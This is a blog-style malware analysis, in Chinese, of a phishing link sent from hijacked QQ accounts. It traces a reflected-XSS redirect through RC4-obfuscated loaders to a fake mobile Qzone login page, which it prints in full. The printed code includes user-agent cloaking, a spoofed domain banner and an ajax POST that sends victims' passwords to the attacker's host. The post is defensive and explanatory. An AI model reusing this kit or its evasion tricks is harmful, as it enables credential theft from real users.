记网友 QQ 被盗群发的套路链接

又看见一个骗子,趁机水一篇。

如题,这个套路消息是这样的: 「https://url.cn/5x4a6Hg&tLKvRPKISY 这是你?/微笑」(url.cn 是腾讯自家的短网址服务,看起来更像熟人发的。下文出现的链接和域名都是样本原样记录,请勿在真实设备上打开。)

用移动设备打开,显示的是一个仿冒的 QQ 空间登录页,要求输入帐号密码;输入后帐号密码就被 POST 到骗子的服务器,QQ 随即被盗(然后再用盗来的号往群里继续发这条消息)。

这个短网址最先跳转到一个本身无害的正经网站(fz.fang.com)的搜索页:搜索词没有转义就直接回显在页面里,是个反射型 XSS,骗子把自己的脚本塞进搜索词,借正规域名的壳来躲链接拦截(大概如此)。而且他用的标签名字就叫 xss. 黑人问号.jpg

骗子插入了一段 js 代码,src 为 wudi.74sq.cn/404.php(文件名装成 404 错误页,实际返回的是恶意脚本)。

本来用电脑 curl 之,发现这个 js 只是直接跳转到腾讯网(window.location.href = "http://www.qq.com";)——服务端按 User-Agent 分流,非移动 UA 只拿到一段无害的跳转,用桌面 UA 去看的分析者和爬虫什么都看不到。

于是带上手机的 UA 再 curl, 验明正身,返回的是下面这段:

// Stage 1 of the phishing chain (what wudi.74sq.cn/404.php serves to a
// mobile User-Agent). It throws away the current page and replaces it with
// an attacker-controlled HTML document.
//
// The HTML is stored URL-escaped (the decoded form is listed further down
// this page). Its inline <script> calls arcfour()/base64_decode() -- both
// declared later in this same script, so hoisted -- to RC4-decrypt the next
// stage with the key "36a9dc5d29d54b46793d0c682298dbab" and document.write()s
// the result.
(function () {
// "replace" discards the existing document, so the XSS'd search page
// disappears and the victim only ever sees the attacker's content.
var new_doc = document.open("text/html", "replace");
var html = unescape("%3Chtml%3E%0A%3Chead%3E%0A%3Cmeta%20http-equiv%3D%22content-type%22%20content%3D%22text/html%3Bcharset%3Dutf-8%22%3E%3Cmeta%20http-equiv%3D%22X-UA-Compatible%22%20content%3D%22IE%3DEdge%22%3E%3Cmeta%20content%3D%22always%22%20name%3D%22referrer%22%3E%0A%3Cscript%20type%3D%22text/javascript%22%3E%0Adocument.write%28decodeURIComponent%28arcfour%28%2236a9dc5d29d54b46793d0c682298dbab%22%2Cbase64_decode%28%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%3D%3D%22%29%29%29%29%3B%0A%3C/script%3E%0A%3C/head%3E%0A%3Cbody%3E%0A%3C/body%3E%0A%3C/html%3E");
new_doc.write(html);
new_doc.close();
})();
// Side business after the document swap: inject a hidden <iframe> pointing
// at Baidu's favicon, remove it 9 ms after it has loaded, and blank the
// document title. What the iframe is for is not determinable from this
// sample (it is gone almost as soon as it loads) -- NOTE(review): possibly
// a cache/referrer trick, but that is a guess.
var set = document.createElement('iframe');
set.src = 'https://www.baidu.com/favicon.ico';
set.style.display = 'none';
set.onload = function () {
setTimeout(function () {
set.remove();
}, 9)
}
// Empty title so nothing about the original (search) page survives in tabs/history.
document.title = '';
// document.body here is the <body> of the freshly written document above.
document.body.appendChild(set);
// Helper trio used by the written-in stage (one minified line, kept as captured):
//
//  base64_encode(d)  -- plain base64 of a "binary string" d (one char per byte).
//                       Not called by anything shown on this page.
//  base64_decode(d)  -- inverse of the above; '=' (index 64 of the table) is
//                       treated as padding via the u==64 / t==64 branches.
//                       Returns d unchanged when d is falsy.
//  arcfour(k, d)     -- textbook RC4: key-scheduling loop over the 256-entry
//                       state, then the PRGA XORs each byte of d with a
//                       keystream byte. k is consumed as raw char codes, so the
//                       32-hex-char key above is used as a 32-byte ASCII key,
//                       not as 16 bytes.
//
// Sloppiness worth noting for anyone re-implementing a decoder: arcfour()
// assigns s, l and y without var, so they leak as globals; base64_encode()
// redeclares r mid-function.
function base64_encode(d){var q='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var z,y,x,w,v,u,t,s,i=0,j=0,p='',r=[];if(!d){return d}do{z=d.charCodeAt(i++);y=d.charCodeAt(i++);x=d.charCodeAt(i++);s=z<<16|y<<8|x;w=s>>18&0x3f;v=s>>12&0x3f;u=s>>6&0x3f;t=s&0x3f;r[j++]=q.charAt(w)+q.charAt(v)+q.charAt(u)+q.charAt(t)}while(i<d.length);p=r.join('');var r=d.length%3;return(r?p.slice(0,r-3):p)+'==='.slice(r||3)}function base64_decode(d){var q='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var z,y,x,w,v,u,t,s,i=0,j=0,r=[];if(!d){return d}d+='';do{w=q.indexOf(d.charAt(i++));v=q.indexOf(d.charAt(i++));u=q.indexOf(d.charAt(i++));t=q.indexOf(d.charAt(i++));s=w<<18|v<<12|u<<6|t;z=s>>16&0xff;y=s>>8&0xff;x=s&0xff;if(u==64){r[j++]=String.fromCharCode(z)}else if(t==64){r[j++]=String.fromCharCode(z,y)}else{r[j++]=String.fromCharCode(z,y,x)}}while(i<d.length);return r.join('')}function arcfour(k,d){var o='';s=new Array();var n=256;l=k.length;for(var i=0;i<n;i++){s[i]=i}for(var j=i=0;i<n;i++){j=(j+s[i]+k.charCodeAt(i%l))%n;var x=s[i];s[i]=s[j];s[j]=x}for(var i=j=y=0;y<d.length;y++){i=(i+1)%n;j=(j+s[i])%n;x=s[i];s[i]=s[j];s[j]=x;o+=String.fromCharCode(d.charCodeAt(y)^s[(s[i]+s[j])%n])}return o}

把 unescape 里那串字符串解码一下,得到:

<!-- Decoded stage-1 document. Nothing visible: the only purpose is the
     inline script, which decrypts and writes the next stage. -->
<html>
<head>
<!-- referrer=always: the full referrer is sent on every navigation/request from here. -->
<meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta content="always" name="referrer">
<script type="text/javascript">
// base64 -> RC4 (key 36a9dc5d29d54b46793d0c682298dbab) -> URL-decode -> document.write.
// The plaintext is the small jQuery/$.getScript loader listed next.
document.write(decodeURIComponent(arcfour("36a9dc5d29d54b46793d0c682298dbab",base64_decode("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"))));
</script>
</head>
<body>
</body>
</html>

还要套:这段 HTML 里的脚本把一段 base64 数据用 arcfour(RC4,密钥 36a9dc5d29d54b46793d0c682298dbab)解密、再 decodeURIComponent 之后 document.write 进去。解出来是:

1
2
3
4
5
6
7
8
<!-- Stage 2 (the RC4-decrypted content): pull jQuery from Baidu's CDN, then
     fetch and execute the real kit loader from the attacker's host. -->
<script src="http://libs.baidu.com/jquery/2.0.0/jquery.min.js"></script>
<meta charset="utf-8">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script>
$(function(){
// $.getScript() downloads login.js and eval()s it -- this is the next stage.
$.getScript('http://wudi.74sq.cn/template/login.js');
});
</script>

外面套个 $() 倒是调用了函数(先从 libs.baidu.com 拉 jQuery,再用 $.getScript 把脚本拉下来执行)…… http://wudi.74sq.cn/template/login.js, 就是它没错了。

他又套了一层…… 这个 js 在 document 里 write 了一个包含一段 js 代码的 html, 又套一层。然后终于出现真身——一个仿冒手机 QQ 空间登录页的 HTML:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
<!-- Final stage: the fake mobile Qzone login page. -->
<!DOCTYPE html>
<html lang="zh-cn">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1,maximum-scale=1,initial-scale=1,user-scalable=no"/>
<meta name="apple-mobile-web-app-capable" content="yes"/>
<!-- Genuine Tencent assets are mixed in so the page looks and behaves like the
     real thing: the mobile-QQ JS SDK (qqapi.js) and the real Qzone login
     stylesheet. Only css.css comes from the attacker's host. -->
<script src="//libs.baidu.com/jquery/2.0.0/jquery.min.js"></script>
<script src="//open.mobile.qq.com/sdk/qqapi.js?_bid=152"></script>
<link rel="stylesheet" href="//qzonestyle.gtimg.cn/qzone/phone/style/login.css"/>
<link rel="stylesheet" href="//wudi.74sq.cn/template/css.css"/>
<!-- top banner -->
</head>
<script type="text/javascript">
// Write a cookie that expires 30 days from now. The kit uses it to mark a
// victim as "already logged in" (setCookie("login","yes") after the POST).
//
// name  - cookie name
// value - cookie value; stored escape()d
function setCookie(name, value) {
var Days = 30;
var exp = new Date();
exp.setTime(exp.getTime() + Days * 24 * 60 * 60 * 1000);
document.cookie = name + "=" + escape(value) + ";expires=" + exp.toGMTString();
}
// Read a cookie by name from document.cookie.
//
// name - cookie name (interpolated into a RegExp unescaped)
// Returns the unescape()d value, or the number 0 (not null/"") when absent.
function getCookie(name) {
var arr, reg = new RegExp("(^| )" + name + "=([^;]*)(;|$)");

if (arr = document.cookie.match(reg))

return unescape(arr[2]);
else
return 0;
}
// Repeat-visit cover: once the victim has submitted the form (the ajax
// handler below sets login=yes), reopening the link bounces straight to the
// real Qzone profile page, so it looks like a normal logged-in session and
// nobody wonders why they keep being asked for a password.
if (getCookie("login")){
window.location.href='https://h5.qzone.qq.com/mqzone/profile?stat=&hostuin=0#0/info/me';// second-visit redirect target

}

// mqq is presumably provided by the qqapi.js SDK loaded in <head>: set the
// in-app browser's title-bar buttons ("相册" on the left, right one hidden),
// mimicking the chrome of the genuine Qzone page inside mobile QQ.
$(function(){
mqq.ui.setTitleButtons({
left : {
title : "相册",
callback : function () {
}
},
right : {
hidden: true
}
})
});
</script>
<body style="zoom: 1;">
<script>
// Packed with the well-known eval(function(p,a,c,k,e,r){...}) packer; the
// dictionary is the '|'-separated list at the end of the line. Unpacked, it
// does the following, in order:
//
//  1. var doc = $(document); two touch-Y trackers. touchstart records the
//     finger Y; on touchmove, if the page is at scrollTop 0 and the finger
//     moved down, preventDefault() and prepend
//       <div id="_domain_display" style="text-align:center;background-color:#bebdc2;...">
//         <p>网页由 ui.ptlogin2.qq.com 提供</p><p>QQ浏览器X5内核提供技术支持</p>
//       </div>
//     sized to the drag distance; touchend slideUp()s and removes it.
//     This fakes the pull-down banner of the QQ in-app browser that reveals
//     the real host name -- showing Tencent's genuine login host instead.
//  2. var system = {win:false, mac:false, xll:false}; navigator.platform is
//     tested with indexOf("Win")/("Mac"); X11/Linux goes into system.x11
//     but the check reads system.xll (typo), so only Windows/Mac desktops
//     get window.location.href = "http://qzone.qq.com". (Android reports a
//     Linux platform, so the typo is what keeps Android victims on the page.)
//  3. if navigator.userAgent has no 'QQ/' -> window.location.href =
//     'http://qzone.qq.com'. Only the mobile-QQ in-app browser sees the form;
//     every other client (and any analyst's browser) lands on the real site.
//  4. var province = remote_ip_info.province; var city = remote_ip_info.city;
//     document.getElementById("ip").value = province + city;
//     remote_ip_info is what the sina iplookup <script> inside the form
//     defines, and #ip is the hidden input next to it. Both come later in the
//     document than this script, so as written this line presumably throws
//     (steps 1-3 have already run by then) -- NOTE(review): confirm by unpacking.
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1 k=$(r);1 5=0;1 8=0;g("G",4(a){5=a.w[0].q});g("R",4(a){8=a.w[0].q;7(k.17()<=0&&5<8){a.D();7($("#3").J<=0){$("K").L(\'<m S="3" T="U-V:W;Y-l:#15;l:#16;d:18;1b-1c:1d;z-d:A;B-C:1g;E:F;"><p>网页由 \'+\'H.I.i.h\'+\' 提供</p><p>j浏览器M内核提供技术支持</p></m>\')}$("#3").d((8-5))}});g("N",4(a){$("#3").O("P",4(){$("#3").Q()})});1 2={e:c,b:c,n:c};1 p=o.X;2.e=p.6("Z")==0;2.b=p.6("10")==0;2.11=(p=="12")||(p.6("13")==0);7(2.e||2.b||2.n){y.s.t="u://v.i.h"}7(o.19.6(\'j/\')>0){}1a{y.s.t=\'u://v.i.h\'}1 9=x.9;1 f=x.f;r.1e("1f").14=9+f;',62,79,'|var|system|_domain_display|function|_touches_point1|indexOf|if|_touches_point2|province||mac|false|height|win|city|addEventListener|com|qq|QQ|doc|color|div|xll|navigator||pageY|document|location|href|http|qzone|touches|remote_ip_info|window|line|26px|font|size|preventDefault|overflow|hidden|touchstart|ui|ptlogin2|length|body|prepend|X5|touchend|slideUp|normal|remove|touchmove|id|style|text|align|center|platform|background|Win|Mac|x11|X11|Linux|value|bebdc2|65696c|scrollTop|0px|userAgent|else|padding|top|15px|getElementById|ip|12px'.split('|'),0,{}))
</script>
<!-- Markup cloned from the real mobile Qzone login page (same ids/classes,
     styled by the genuine login.css above). Most of it is inert decoration;
     only #loginform, #u, #p and #go are wired up by the script at the bottom. -->
<div id="content" class="content">
<div id="error_tips">
<div id="error_tips_content">
<span id="error_icon"></span>
<span id="error_message"></span>
</div>
</div>
<div id="login" class="login">
<div id="logo" class="logo">
</div>
<div id="app_name" style="display: none">
</div>
<div id="q_login" class="q_login" style="display: none">
<div id="q_login_title">
<div id="q_login_logo">
</div>
<label id="q_login_tips"></label>
</div>
<div id="q_logon_list" class="q_logon_list">
</div>
</div>
<div id="web_login">
<!-- No action/method: the form is never submitted natively, it is serialized
     and POSTed by $.ajax to //wudi.74sq.cn/user.php (see the last script). -->
<form id="loginform" autocomplete="off" name="loginform" action="" method="" target="" style="margin:0">
<!-- Third-party geo-IP lookup; defines remote_ip_info, whose province+city the
     packed script writes into the hidden "ip" field so it travels with the
     stolen credentials. -->
<script src="http://int.dpool.sina.com.cn/iplookup/iplookup.php?format=js"></script>
<input type="hidden" name="ip" id="ip"/>
<ul id="g_list">
<li id="g_u">
<div id="del_touch" class="del_touch">
<span id="del_u" class="del_u"></span>
</div>
<!-- Random-string field names (here and for the password) instead of u/p;
     presumably to make the POST less obvious to anyone grepping traffic. -->
<input id="u" class="inputstyle" name="hrUW3PG7mp3RLd3dJu" autocomplete="off" placeholder="QQ号码/手机/邮箱"/></li>
<li id="g_p">
<div id="del_touch_p" class="del_touch">
<span id="del_p" class="del_u"></span>
</div>
<input id="p" class="inputstyle" maxlength="16" type="password" name="LxMzAX2jog9Bpjs07jP" autocorrect="off" placeholder="请输入您的QQ密码"/></li>
</ul>
<!-- The "login" button is a <div> with a click handler, not a submit button. -->
<div href="javascript:void(0);" id="go">登 录</div>
</form>
</div>
<div id="switch">
<!-- pt._switch() is referenced but no "pt" object is defined anywhere in this
     page; the element is hidden, so it is dead markup copied from the original. -->
<div id="swicth_login" onclick="pt._switch()" style="display: none">
</div>
<div id="zc_feedback">
<!-- "Register" / "forgot password" really open the genuine ptlogin2.qq.com
     URLs (the first one with \x-escaped "://"), adding to the illusion. -->
<span id="zc" onclick="window.open('http\x3A\x2F\x2Fptlogin2.qq.com\x2Fj_newreg_url')">注册新帐号</span>
<span id="forgetpwd" onclick="window.open('http://ptlogin2.qq.com/j_findpwd_url')">忘了密码?</span>
</div>
</div>
<div id="custom_bottom">
</div>
</div>
<!-- Captcha area copied from the real page; nothing on this page ever fills or shows it. -->
<div id="vcode">
<label id="vcode_tips"></label>
<div id="vcode_area">
<img id="vcode_img"/>
<label id="input_tips"></label>
<input id="vcode_input" name="vcode_input" tabindex="3" autocomplete="off" autocorrect="off" maxlength="6"/>
</div>
<div id="button">
</div>
</div>
</div>
<div id="new_vcode" class="new_vcode">
</div>
<div id="footerBlank">
</div>
<script>
// Credential-harvesting logic. Validation below copies what the real login
// form checks, so a victim gets familiar-looking error messages; the only
// thing that differs is where the form goes.
var times = 0; // never read
// Show msg in the error banner and set the (implicit global) err flag.
function error(msg) {
$("#error_tips").css({
display: 'block'
});
$('#error_message').html(msg);
err = true;
}
// Focusing any input clears the banner and the flag.
$('form input').focus(function() {
$("#error_tips").css({
display: 'none'
});
err = false;
});
$("#error_tips").on('click',
function() {
$(this).hide();
});
$("#go").on('click',
function() {
var $this = $(this);
err = false;
var p = $("#p").val();
var u = $("#u").val();
// Same client-side rules as the genuine page: non-empty account, 6-10 digit
// QQ number not starting with 0 (so the "手机/邮箱" placeholder is a lie),
// password length 6-16.
u == '' && error('您还没有输入帐号!');
if (err) return false;
p == '' && error("您还没有输入密码!");
if (err) return false;
/^[1-9][0-9]{5,9}$/.test(u) || error('请输入正确的帐号!');
if (err) return false;
var len = p.length; (len < 6 || len > 16) && error('您输入的帐号或密码不正确,请重新输入。');
if (err) {
$("#p").val('');
return false;
}
if (!err){
// Exfiltration: the serialized form (ip + the two random-named fields)
// is POSTed to the attacker's user.php.
$.ajax({
url:'//wudi.74sq.cn/user.php',
type:'POST',
dataType:'json',
data: $('#loginform').serialize(),
// Only an error callback, no success callback. Whenever the response is
// not parseable JSON (or the request fails), mark the victim as
// "logged in" for 30 days and hand them over to the real Qzone, so the
// experience ends on the genuine site. Presumably user.php's reply is
// arranged to take this path -- can't tell from the client side.
error:function(er){
setCookie("login", "yes")
window.location.href='//qzone.qq.com';
}
})
}
})
</script>
<div style="display:none;">
</div>
</body>
</html>

无聊的伪装。提交过一次之后会写一个有效期 30 天的 login Cookie,下次再打开这个页面会直接跳到真正的 QQ 空间个人主页,防止用户再次点开看到未登录状态而起疑心。注意跳转写在 $.ajax 的 error 回调里,根本没有 success 回调——只要 user.php 的响应不是可解析的 JSON(或请求出错),用户就被送到真正的 qzone.qq.com,整个流程在正版站点上结束。

他使用 POST 提交,URL 为 http://wudi.74sq.cn/user.php, 数据格式: ip=&hrUW3PG7mp3RLd3dJu=用户名&LxMzAX2jog9Bpjs07jP=密码。表单字段名是随机字符串;ip 字段由页面里那段 packed 脚本用新浪 iplookup 接口查到的省市填入(大概是为了记录受害者地域)。另外那段 packed 脚本还会把桌面平台、以及 UA 里没有 QQ/ 的浏览器统统跳到真正的 qzone.qq.com,只有手机 QQ 内置浏览器能看到这个钓鱼页——分析时要带对 UA。

结束。如果已经在这类页面里输过密码,应立即改密,并检查、下线陌生的登录设备。